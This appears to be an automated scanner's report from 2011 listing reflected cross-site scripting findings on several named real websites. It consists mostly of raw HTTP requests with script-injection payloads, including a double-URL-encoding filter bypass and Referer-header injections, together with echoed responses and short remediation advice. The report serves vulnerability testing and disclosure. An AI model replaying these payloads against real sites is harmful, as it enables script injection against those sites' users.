GET /rss85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad/publications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518 was submitted in the REST URL parameter 2. This input was echoed as 438f3"><script>alert(1)</script>2ac3b841518 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/publications438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 was submitted in the REST URL parameter 3. This input was echoed as d7207"><script>alert(1)</script>5a1738ffeb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/publications/rss.xmld7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 was submitted in the REST URL parameter 1. This input was echoed as 53325"><script>alert(1)</script>5cfc2555b00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /x2253325%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cfc2555b00 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.303. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.wileyrein.com
Path:
/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b894"><script>alert(1)</script>8dd0074b00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /x22?4b894"><script>alert(1)</script>8dd0074b00e=1 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 74302<img%20src%3da%20onerror%3dalert(1)>9c7a66be0e0 was submitted in the REST URL parameter 1. This input was echoed as 74302<img src=a onerror=alert(1)>9c7a66be0e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Washington-DC74302<img%20src%3da%20onerror%3dalert(1)>9c7a66be0e0/Attorneys HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56576"><script>alert(1)</script>eda13df7848 was submitted in the Referer HTTP header. This input was echoed as 56576\"><script>alert(1)</script>eda13df7848 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: gc.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=56576"><script>alert(1)</script>eda13df7848
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:08:53 GMT Server: Apache/2.2.10 (CentOS) X-Pingback: http://gc.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 121965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <a href="http://duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/" onclick="urchinTracker('/outgoing/duodra.co/post/seu-ambiente-de-trabalho-em-7-itens/?referer=http://www.google.com/search?hl=en&q=56576\"><script>alert(1)</script>eda13df7848');"> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload f8d51--><script>alert(1)</script>e2c96b26918 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1 Host: gc.blog.br Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f8d51--><script>alert(1)</script>e2c96b26918
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:02 GMT Server: Apache/2.2.10 (CentOS) X-Pingback: http://gc.blog.br/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 121965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <a href="http://www.devinrio.com.br" onclick="urchinTracker('/outgoing/www.devinrio.com.br?referer=http://www.google.com/search?hl=en&q=f8d51--><script>alert(1)</script>e2c96b26918');"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3aa4"><script>alert(1)</script>5b3e569b7ac was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: f3aa4"><script>alert(1)</script>5b3e569b7ac
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:52 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Gestaltung+von+Flyern&blogurl=f3aa4"><script>alert(1)</script>5b3e569b7ac&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1fbc"-alert(1)-"4da742fdffd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domainserve/domainView HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e1fbc"-alert(1)-"4da742fdffd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff5f"><script>alert(1)</script>3d126670e87 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5ff5f"><script>alert(1)</script>3d126670e87
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:39 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 92849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=5ff5f"><script>alert(1)</script>3d126670e87" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload aef4b<script>alert(1)</script>c275ed0f500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=aef4b<script>alert(1)</script>c275ed0f500
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:26:39 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 92835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>aef4b<script>alert(1)</script>c275ed0f500 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56449"><a>3c0af12941a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arnoldporter.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=56449"><a>3c0af12941a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18264165;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/ Set-Cookie: CFTOKEN=19385056;expires=Fri, 11-Jan-2041 15:14:59 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a813"><a>7b216e3e1ad was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_diversity_our_values.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=1a813"><a>7b216e3e1ad
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7be1"><a>6b37d6049c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_pro_bono_our_commitment.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=a7be1"><a>6b37d6049c6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18dcd"><a>1951d83601 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_recognition.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=18dcd"><a>1951d83601
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e576"><a>6afa9807f84 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_recognition_rankings.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=7e576"><a>6afa9807f84
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:28:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86c8"><a>12209855120 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about_the_firm_who_we_are.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=d86c8"><a>12209855120
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47c51"><a>3e7a64ab71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /advisory.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=47c51"><a>3e7a64ab71
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:27:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f57f0"><a>27be33cf6b9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /careers.cfm HTTP/1.1 Host: www.arnoldporter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true; Referer: http://www.google.com/search?hl=en&q=f57f0"><a>27be33cf6b9
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:26:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a4c"><a>7d008f3eaa6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
